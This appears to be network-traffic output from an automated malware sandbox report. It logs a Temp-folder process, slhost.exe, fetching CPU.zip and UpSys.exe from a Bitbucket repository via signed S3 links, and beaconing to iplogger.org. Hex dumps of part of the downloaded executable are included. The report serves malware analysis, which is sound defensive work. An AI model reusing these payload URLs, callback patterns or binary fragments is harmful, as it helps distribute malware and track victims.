                                                                                                                                                                                UA-CPU: AMD64
                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                Host: bitbucket.org
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                2021-11-11 11:27:19 UTC13478INHTTP/1.1 302 Found
                                                                                                                                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://d301sr5gafysq2.cloudfront.net; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com https://d301sr5gafysq2.cloudfront.net; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com analytics.atlassian.com as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net sentry.io bqlf8qjztdtr.statuspage.io https://d301sr5gafysq2.cloudfront.net; object-src about:; base-uri 'self'
                                                                                                                                                                                Server: nginx
                                                                                                                                                                                X-Usage-Quota-Remaining: 998637.267
                                                                                                                                                                                Vary: Accept-Language, Origin
                                                                                                                                                                                X-Usage-Request-Cost: 767.87
                                                                                                                                                                                Cache-Control: no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                X-B3-TraceId: 8a216e3a70a5a539
                                                                                                                                                                                X-Usage-Output-Ops: 0
                                                                                                                                                                                X-Dc-Location: Micros
                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                Date: Thu, 11 Nov 2021 11:27:19 GMT
                                                                                                                                                                                X-Usage-User-Time: 0.023036
                                                                                                                                                                                X-Usage-System-Time: 0.000000
                                                                                                                                                                                Location: https://bbuseruploads.s3.amazonaws.com/e8466680-8c82-495b-9e3c-2c79f82869ce/downloads/7737de24-30d9-4daf-b72b-bce98dc0f6f9/CPU.zip?Signature=3Tzq39O6DbHYG0DRC9lAn6yjoV4%3D&Expires=1636631244&AWSAccessKeyId=AKIA6KOSE3BNJRRFUUX6&versionId=rNhERZ1bRKwlh0QCY62w5KsnWg9_i2WQ&response-content-disposition=attachment%3B%20filename%3D%22CPU.zip%22
                                                                                                                                                                                X-Served-By: 8b8f95b754b6
                                                                                                                                                                                Expires: Thu, 11 Nov 2021 11:27:19 GMT
                                                                                                                                                                                Content-Language: en
                                                                                                                                                                                X-View-Name: bitbucket.apps.downloads.views.download_file
                                                                                                                                                                                X-Static-Version: a4fadf181312
                                                                                                                                                                                X-Render-Time: 0.0432698726654
                                                                                                                                                                                Connection: close
                                                                                                                                                                                X-Usage-Input-Ops: 0
                                                                                                                                                                                X-Request-Count: 2452
                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                X-Version: a4fadf181312
                                                                                                                                                                                X-Cache-Info: not cacheable; response specified "Cache-Control: no-cache"
                                                                                                                                                                                Content-Length: 0


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                15192.168.2.549866104.192.141.1443C:\Users\user\AppData\Local\Temp\slhost.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                2021-11-11 11:27:32 UTC13480OUTGET /tilttilttilt/test1/downloads/CPU.zip HTTP/1.1
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                UA-CPU: AMD64
                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                Host: bitbucket.org
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                2021-11-11 11:27:32 UTC13480INHTTP/1.1 302 Found
                                                                                                                                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://d301sr5gafysq2.cloudfront.net; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com https://d301sr5gafysq2.cloudfront.net; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com analytics.atlassian.com as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net sentry.io bqlf8qjztdtr.statuspage.io https://d301sr5gafysq2.cloudfront.net; object-src about:; base-uri 'self'
                                                                                                                                                                                Server: nginx
                                                                                                                                                                                X-Usage-Quota-Remaining: 999224.868
                                                                                                                                                                                Vary: Accept-Language, Origin
                                                                                                                                                                                X-Usage-Request-Cost: 791.70
                                                                                                                                                                                Cache-Control: no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                X-B3-TraceId: e082c3e83cf799b1
                                                                                                                                                                                X-Usage-Output-Ops: 0
                                                                                                                                                                                X-Dc-Location: Micros
                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                Date: Thu, 11 Nov 2021 11:27:32 GMT
                                                                                                                                                                                X-Usage-User-Time: 0.023751
                                                                                                                                                                                X-Usage-System-Time: 0.000000
                                                                                                                                                                                Location: https://bbuseruploads.s3.amazonaws.com/e8466680-8c82-495b-9e3c-2c79f82869ce/downloads/7737de24-30d9-4daf-b72b-bce98dc0f6f9/CPU.zip?Signature=3Tzq39O6DbHYG0DRC9lAn6yjoV4%3D&Expires=1636631244&AWSAccessKeyId=AKIA6KOSE3BNJRRFUUX6&versionId=rNhERZ1bRKwlh0QCY62w5KsnWg9_i2WQ&response-content-disposition=attachment%3B%20filename%3D%22CPU.zip%22
                                                                                                                                                                                X-Served-By: be7f0adbb6a0
                                                                                                                                                                                Expires: Thu, 11 Nov 2021 11:27:32 GMT
                                                                                                                                                                                Content-Language: en
                                                                                                                                                                                X-View-Name: bitbucket.apps.downloads.views.download_file
                                                                                                                                                                                X-Static-Version: a4fadf181312
                                                                                                                                                                                X-Render-Time: 0.0542149543762
                                                                                                                                                                                Connection: close
                                                                                                                                                                                X-Usage-Input-Ops: 0
                                                                                                                                                                                X-Request-Count: 1910
                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                X-Version: a4fadf181312
                                                                                                                                                                                X-Cache-Info: not cacheable; response specified "Cache-Control: no-cache"
                                                                                                                                                                                Content-Length: 0


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                16192.168.2.54986988.99.66.31443C:\Users\user\AppData\Local\Temp\slhost.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                2021-11-11 11:27:35 UTC13482OUTGET /1fEwd7 HTTP/1.1
                                                                                                                                                                                MySpecialHeder: whatever
                                                                                                                                                                                User-Agent: Run
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Host: iplogger.org
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Cookie: clhf03028ja=102.129.143.91
                                                                                                                                                                                2021-11-11 11:27:35 UTC13482INHTTP/1.1 200 OK
                                                                                                                                                                                Server: nginx
                                                                                                                                                                                Date: Thu, 11 Nov 2021 11:27:35 GMT
                                                                                                                                                                                Content-Type: image/png
                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Set-Cookie: PHPSESSID=g1ivjje4j0nq1f173vjr10tc90; path=/; HttpOnly
                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                Set-Cookie: clhf03028ja=102.129.143.91; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=242418136; path=/
                                                                                                                                                                                Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                Answers:
                                                                                                                                                                                whoami: 25ed0554a433f7297ab5083bd5a6f93ea5b659070b6cc52ec1287153e68c8cc1
                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                                2021-11-11 11:27:35 UTC13483INData Raw: 37 34 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 01 03 00 00 00 25 db 56 ca 00 00 00 03 50 4c 54 45 00 00 00 a7 7a 3d da 00 00 00 01 74 52 4e 53 00 40 e6 d8 66 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e c4 01 95 2b 0e 1b 00 00 00 0a 49 44 41 54 08 99 63 60 00 00 00 02 00 01 f4 71 64 a6 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                Data Ascii: 74PNGIHDR%VPLTEz=tRNS@fpHYs+IDATc`qdIENDB`0


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                17192.168.2.549874104.192.141.1443C:\Users\user\AppData\Local\Temp\slhost.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                2021-11-11 11:27:43 UTC13483OUTGET /tilttilttilt/test1/downloads/CPU.zip HTTP/1.1
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                UA-CPU: AMD64
                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                Host: bitbucket.org
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                2021-11-11 11:27:44 UTC13484INHTTP/1.1 302 Found
                                                                                                                                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://d301sr5gafysq2.cloudfront.net; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com https://d301sr5gafysq2.cloudfront.net; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com analytics.atlassian.com as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net sentry.io bqlf8qjztdtr.statuspage.io https://d301sr5gafysq2.cloudfront.net; object-src about:; base-uri 'self'
                                                                                                                                                                                Server: nginx
                                                                                                                                                                                X-Usage-Quota-Remaining: 999191.525
                                                                                                                                                                                Vary: Accept-Language, Origin
                                                                                                                                                                                X-Usage-Request-Cost: 826.07
                                                                                                                                                                                Cache-Control: no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                X-B3-TraceId: 60de0984a4ace9ed
                                                                                                                                                                                X-Usage-Output-Ops: 0
                                                                                                                                                                                X-Dc-Location: Micros
                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                Date: Thu, 11 Nov 2021 11:27:44 GMT
                                                                                                                                                                                X-Usage-User-Time: 0.024782
                                                                                                                                                                                X-Usage-System-Time: 0.000000
                                                                                                                                                                                Location: https://bbuseruploads.s3.amazonaws.com/e8466680-8c82-495b-9e3c-2c79f82869ce/downloads/7737de24-30d9-4daf-b72b-bce98dc0f6f9/CPU.zip?Signature=3Tzq39O6DbHYG0DRC9lAn6yjoV4%3D&Expires=1636631244&AWSAccessKeyId=AKIA6KOSE3BNJRRFUUX6&versionId=rNhERZ1bRKwlh0QCY62w5KsnWg9_i2WQ&response-content-disposition=attachment%3B%20filename%3D%22CPU.zip%22
                                                                                                                                                                                X-Served-By: 90ab1464dcf3
                                                                                                                                                                                Expires: Thu, 11 Nov 2021 11:27:44 GMT
                                                                                                                                                                                Content-Language: en
                                                                                                                                                                                X-View-Name: bitbucket.apps.downloads.views.download_file
                                                                                                                                                                                X-Static-Version: a4fadf181312
                                                                                                                                                                                X-Render-Time: 0.0605671405792
                                                                                                                                                                                Connection: close
                                                                                                                                                                                X-Usage-Input-Ops: 0
                                                                                                                                                                                X-Request-Count: 190
                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                X-Version: a4fadf181312
                                                                                                                                                                                X-Cache-Info: not cacheable; response specified "Cache-Control: no-cache"
                                                                                                                                                                                Content-Length: 0


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                2192.168.2.549774104.192.141.1443C:\Users\user\AppData\Local\Temp\slhost.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                2021-11-11 11:26:24 UTC6358OUTGET /tilttilttilt/test1/downloads/UpSys.exe HTTP/1.1
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                UA-CPU: AMD64
                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                Host: bitbucket.org
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                2021-11-11 11:26:24 UTC6358INHTTP/1.1 302 Found
                                                                                                                                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://d301sr5gafysq2.cloudfront.net; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com https://d301sr5gafysq2.cloudfront.net; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com analytics.atlassian.com as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net sentry.io bqlf8qjztdtr.statuspage.io https://d301sr5gafysq2.cloudfront.net; object-src about:; base-uri 'self'
                                                                                                                                                                                Server: nginx
                                                                                                                                                                                X-Usage-Quota-Remaining: 999207.160
                                                                                                                                                                                Vary: Accept-Language, Origin
                                                                                                                                                                                X-Usage-Request-Cost: 811.27
                                                                                                                                                                                Cache-Control: no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                X-B3-TraceId: 608339e245f21be1
                                                                                                                                                                                X-Usage-Output-Ops: 0
                                                                                                                                                                                X-Dc-Location: Micros
                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                Date: Thu, 11 Nov 2021 11:26:24 GMT
                                                                                                                                                                                X-Usage-User-Time: 0.024338
                                                                                                                                                                                X-Usage-System-Time: 0.000000
                                                                                                                                                                                Location: https://bbuseruploads.s3.amazonaws.com/e8466680-8c82-495b-9e3c-2c79f82869ce/downloads/4cedbadc-424b-4242-93aa-1dc687b9b639/UpSys.exe?Signature=03SjwtOUVCkSGlVBOddWMUL2kd4%3D&Expires=1636631487&AWSAccessKeyId=AKIA6KOSE3BNJRRFUUX6&versionId=W.pANh85KmlWZmruQkzmM9Sllvu_UgzE&response-content-disposition=attachment%3B%20filename%3D%22UpSys.exe%22
                                                                                                                                                                                X-Served-By: 91f0af5c562c
                                                                                                                                                                                Expires: Thu, 11 Nov 2021 11:26:24 GMT
                                                                                                                                                                                Content-Language: en
                                                                                                                                                                                X-View-Name: bitbucket.apps.downloads.views.download_file
                                                                                                                                                                                X-Static-Version: a4fadf181312
                                                                                                                                                                                X-Render-Time: 0.0630421638489
                                                                                                                                                                                Connection: close
                                                                                                                                                                                X-Usage-Input-Ops: 0
                                                                                                                                                                                X-Request-Count: 3926
                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                X-Version: a4fadf181312
                                                                                                                                                                                X-Cache-Info: not cacheable; response specified "Cache-Control: no-cache"
                                                                                                                                                                                Content-Length: 0


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                3192.168.2.54977552.216.1.8443C:\Users\user\AppData\Local\Temp\slhost.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                2021-11-11 11:26:26 UTC6361OUTGET /e8466680-8c82-495b-9e3c-2c79f82869ce/downloads/4cedbadc-424b-4242-93aa-1dc687b9b639/UpSys.exe?Signature=03SjwtOUVCkSGlVBOddWMUL2kd4%3D&Expires=1636631487&AWSAccessKeyId=AKIA6KOSE3BNJRRFUUX6&versionId=W.pANh85KmlWZmruQkzmM9Sllvu_UgzE&response-content-disposition=attachment%3B%20filename%3D%22UpSys.exe%22 HTTP/1.1
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                UA-CPU: AMD64
                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Host: bbuseruploads.s3.amazonaws.com
                                                                                                                                                                                2021-11-11 11:26:26 UTC6361INHTTP/1.1 200 OK
                                                                                                                                                                                x-amz-id-2: 4kLH0RWDmbptSLstEbfduDPoMS8N3RRU9FEH+0jDFA1TNFJesTZQ+R3FCZi5q4q0inynCAdEuJ0=
                                                                                                                                                                                x-amz-request-id: JG52F139E6ND651A
                                                                                                                                                                                Date: Thu, 11 Nov 2021 11:26:27 GMT
                                                                                                                                                                                Last-Modified: Fri, 08 Oct 2021 15:56:47 GMT
                                                                                                                                                                                ETag: "efe5769e37ba37cf4607cb9918639932"
                                                                                                                                                                                x-amz-version-id: W.pANh85KmlWZmruQkzmM9Sllvu_UgzE
                                                                                                                                                                                Content-Disposition: attachment; filename="UpSys.exe"
                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                Content-Type: application/x-msdownload
                                                                                                                                                                                Content-Length: 945944
                                                                                                                                                                                Server: AmazonS3
                                                                                                                                                                                Connection: close
                                                                                                                                                                                2021-11-11 11:26:26 UTC6362INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 80 69 b1 40 c4 08 df 13 c4 08 df 13 c4 08 df 13 79 47 49 13 c6 08 df 13 cd 70 5c 13 7d 08 df 13 cd 70 4a 13 ca 08 df 13 cd 70 5b 13 fd 08 df 13 e3 ce b2 13 cd 08 df 13 e3 ce 5f 13 c5 08 df 13 e3 ce a4 13 e5 08 df 13 c4 08 de 13 d7 0a df 13 cd 70 50 13 82 08 df 13 da 5a 4a 13 c6 08 df 13 da 5a 4b 13 c5 08 df 13 c4 08 48 13 c5 08 df 13 cd 70 4e 13 c5 08 df 13 52 69 63 68 c4 08 df
                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$i@yGIp\}pJp[_pPZJZKHpNRich
                                                                                                                                                                                2021-11-11 11:26:26 UTC6378INData Raw: 03 00 c6 47 11 01 48 ff 0f 48 8b 7c 24 68 83 fe 0a 0f 84 1c 0b 03 00 83 fe 10 0f 84 13 0b 03 00 83 fe 11 0f 84 0a 0b 03 00 8b 4d 08 83 f9 02 0f 8c 58 0b 03 00 83 fe 0b 0f 84 d1 00 00 00 83 fe 0d 74 55 83 fe 0e 0f 84 06 01 00 00 83 fe 09 0f 85 72 01 00 00 83 f9 01 0f 84 2a 0a 03 00 80 7d 19 00 0f 85 29 0a 03 00 48 8b 55 10 83 f9 02 0f 85 29 0a 03 00 48 8b 4d 00 e8 f2 fa ff ff 48 8b cd e8 ca fe ff ff 33 c0 48 8b 5c 24 60 48 8b 6c 24 70 48 83 c4 50 5e c3 83 f9 01 0f 84 4c 0a 03 00 80 7d 19 00 0f 85 4b 0a 03 00 48 8b 55 10 83 f9 02 0f 84 eb 00 00 00 80 7d 19 00 0f 85 41 0a 03 00 48 8b 45 10 48 8b 48 18 e8 81 fb ff ff 48 8b cd e8 79 fe ff ff 33 c0 48 8b 5c 24 60 48 8b 6c 24 70 48 83 c4 50 5e c3 48 8b 52 08 48 8b 4a 08 e9 f2 fe ff ff 48 8b 5a 08 48 8b ca e8 5e
                                                                                                                                                                                Data Ascii: GHH|$hMXtUr*})HU)HMH3H\$`Hl$pHP^L}KHU}AHEHHHy3H\$`Hl$pHP^HRHJHZH^
                                                                                                                                                                                2021-11-11 11:26:26 UTC6378INData Raw: 8b c8 48 8b d8 e8 2a 2c 00 00 c7 43 08 09 00 00 00 c6 03 01 48 8b cd e8 28 fd ff ff 48 8b 5c 24 60 48 8b 6c 24 70 33 c0 48 83 c4 50 5e c3 48 8b 4d 00 e9 41 ff ff ff 48 8b cd e8 05 d8 ff ff 48 8b d0 e8 ed b7 00 00 48 8b c8 e8 75 c5 00 00 84 c0 74 3e 48 8b cd e8 d9 b7 00 00 48 8b c8 48 8b d8 e8 ce 2b 00 00 c7 43 08 09 00 00 00 c6 03 01 eb a2 48 8b cd e8 ca d7 ff ff 4c 8b c0 e8 b2 b7 00 00 49 8b c8 48 8b d0 e8 07 ba 00 00 84 c0 75 4a 48 8b cd e8 9b b7 00 00 33 d2 48 8b c8 e8 01 d8 00 00 e9 6c ff ff ff 48 8b cd e8 94 d7 ff ff 48 8b d0 e8 7c b7 00 00 48 8b c8 e8 d4 b9 00 00 84 c0 74 cd 48 8b cd e8 68 b7 00 00 b2 01 48 8b c8 e8 ce d7 00 00 e9 39 ff ff ff 48 8b cd e8 51 b7 00 00 b2 01 48 8b c8 e8 b7 d7 00 00 e9 22 ff ff ff 66 90 b4 4e 00 00 7e 4e 00 00 20 53 03
                                                                                                                                                                                Data Ascii: H*,CH(H\$`Hl$p3HP^HMAHHHut>HHH+CHLIHuJH3HlHH|HtHhH9HQH"fN~N S
                                                                                                                                                                                2021-11-11 11:26:26 UTC6394INData Raw: 8d 05 2e 46 08 00 48 89 04 24 49 8b 01 48 89 87 68 19 0b 00 49 8b 41 08 89 5c 24 08 48 89 87 70 19 0b 00 89 5c 24 0c c7 05 3b 8b 0a 00 04 00 00 00 c7 05 35 8b 0a 00 06 00 00 00 4c 8d 0c 24 48 8d 05 76 81 09 00 48 89 05 27 8b 0a 00 48 8d 05 d0 21 06 00 48 89 04 24 49 8b 01 48 89 87 88 19 0b 00 49 8b 41 08 89 5c 24 08 48 89 87 90 19 0b 00 89 5c 24 0c c7 05 0d 8b 0a 00 01 00 00 00 c7 05 07 8b 0a 00 01 00 00 00 4c 8d 0c 24 48 8d 05 20 81 09 00 48 89 05 f9 8a 0a 00 48 8d 05 c2 2d 06 00 48 89 04 24 49 8b 01 48 89 87 a8 19 0b 00 49 8b 41 08 89 5c 24 08 48 89 87 b0 19 0b 00 89 5c 24 0c c7 05 df 8a 0a 00 01 00 00 00 c7 05 d9 8a 0a 00 01 00 00 00 4c 8d 0c 24 48 8d 05 c2 80 09 00 48 89 05 cb 8a 0a 00 48 8d 05 d4 4d 06 00 48 89 04 24 49 8b 01 48 89 87 c8 19 0b 00 49
                                                                                                                                                                                Data Ascii: .FH$IHhIA\$Hp\$;5L$HvH'H!H$IHIA\$H\$L$H HH-H$IHIA\$H\$L$HHHMH$IHI
                                                                                                                                                                                2021-11-11 11:26:26 UTC6395INData Raw: 49 8b 01 48 89 87 08 1b 0b 00 49 8b 41 08 89 5c 24 08 48 89 87 10 1b 0b 00 89 5c 24 0c c7 05 e5 88 0a 00 01 00 00 00 c7 05 df 88 0a 00 01 00 00 00 4c 8d 0c 24 48 8d 05 48 7c 09 00 48 89 05 d1 88 0a 00 48 8d 05 9a e4 07 00 48 89 04 24 49 8b 01 48 89 87 28 1b 0b 00 49 8b 41 08 89 5c 24 08 48 89 87 30 1b 0b 00 89 5c 24 0c c7 05 b7 88 0a 00 01 00 00 00 c7 05 b1 88 0a 00 02 00 00 00 4c 8d 0c 24 48 8d 05 d2 7b 09 00 48 89 05 a3 88 0a 00 48 8d 05 bc e1 07 00 48 89 04 24 49 8b 01 48 89 87 48 1b 0b 00 49 8b 41 08 89 5c 24 08 48 89 87 50 1b 0b 00 89 5c 24 0c c7 05 89 88 0a 00 02 00 00 00 c7 05 83 88 0a 00 03 00 00 00 4c 8d 0c 24 48 8d 05 64 7b 09 00 48 89 05 75 88 0a 00 48 8d 05 be b2 07 00 48 89 04 24 49 8b 01 48 89 87 68 1b 0b 00 49 8b 41 08 4c 8d 0c 24 48 89 87
                                                                                                                                                                                Data Ascii: IHIA\$H\$L$HH|HHH$IH(IA\$H0\$L$H{HHH$IHHIA\$HP\$L$Hd{HuHH$IHhIAL$H
                                                                                                                                                                                2021-11-11 11:26:26 UTC6411INData Raw: 08 00 00 00 4c 8d 0c 24 48 8d 05 4d 24 09 00 48 89 05 5e 63 0a 00 48 8d 05 a7 93 08 00 48 89 04 24 49 8b 01 48 89 87 88 35 0b 00 49 8b 41 08 89 5c 24 08 48 89 87 90 35 0b 00 89 5c 24 0c c7 05 44 63 0a 00 01 00 00 00 c7 05 3e 63 0a 00 04 00 00 00 4c 8d 0c 24 48 8d 05 ef 23 09 00 48 89 05 30 63 0a 00 48 8d 05 99 a0 06 00 48 89 04 24 49 8b 01 48 89 87 a8 35 0b 00 49 8b 41 08 89 5c 24 08 48 89 87 b0 35 0b 00 89 5c 24 0c c7 05 16 63 0a 00 01 00 00 00 c7 05 10 63 0a 00 02 00 00 00 4c 8d 0c 24 48 8d 05 81 23 09 00 48 89 05 02 63 0a 00 48 8d 05 ab e4 07 00 48 89 04 24 49 8b 01 48 89 87 c8 35 0b 00 49 8b 41 08 89 5c 24 08 48 89 87 d0 35 0b 00 89 5c 24 0c c7 05 e8 62 0a 00 01 00 00 00 c7 05 e2 62 0a 00 02 00 00 00 4c 8d 0c 24 48 8d 05 1b 23 09 00 48 89 05 d4 62 0a
                                                                                                                                                                                Data Ascii: L$HM$H^cHH$IH5IA\$H5\$Dc>cL$H#H0cHH$IH5IA\$H5\$ccL$H#HcHH$IH5IA\$H5\$bbL$H#Hb
                                                                                                                                                                                2021-11-11 11:26:26 UTC6412INData Raw: 05 17 1f 09 00 48 89 05 08 61 0a 00 48 8d 05 71 ca 05 00 48 89 04 24 49 8b 01 48 89 87 28 37 0b 00 49 8b 41 08 89 5c 24 08 48 89 87 30 37 0b 00 89 5c 24 0c 89 1d f2 60 0a 00 89 1d f0 60 0a 00 4c 8d 0c 24 48 8d 05 b1 1e 09 00 48 89 05 e2 60 0a 00 48 8d 05 4b ca 05 00 48 89 04 24 49 8b 01 48 89 87 48 37 0b 00 49 8b 41 08 89 5c 24 08 48 89 87 50 37 0b 00 89 5c 24 0c c7 05 c8 60 0a 00 02 00 00 00 c7 05 c2 60 0a 00 0a 00 00 00 4c 8d 0c 24 48 8d 05 53 1e 09 00 48 89 05 b4 60 0a 00 48 8d 05 8d d7 05 00 48 89 04 24 49 8b 01 48 89 87 68 37 0b 00 49 8b 41 08 89 5c 24 08 48 89 87 70 37 0b 00 89 5c 24 0c 4c 8d 0c 24 48 8d 05 09 1e 09 00 c7 05 8f 60 0a 00 01 00 00 00 c7 05 89 60 0a 00 01 00 00 00 48 89 05 86 60 0a 00 48 8d 05 cf ad 04 00 48 89 04 24 49 8b 01 48 89 87
                                                                                                                                                                                Data Ascii: HaHqH$IH(7IA\$H07\$``L$HH`HKH$IHH7IA\$HP7\$``L$HSH`HH$IHh7IA\$Hp7\$L$H``H`HH$IH
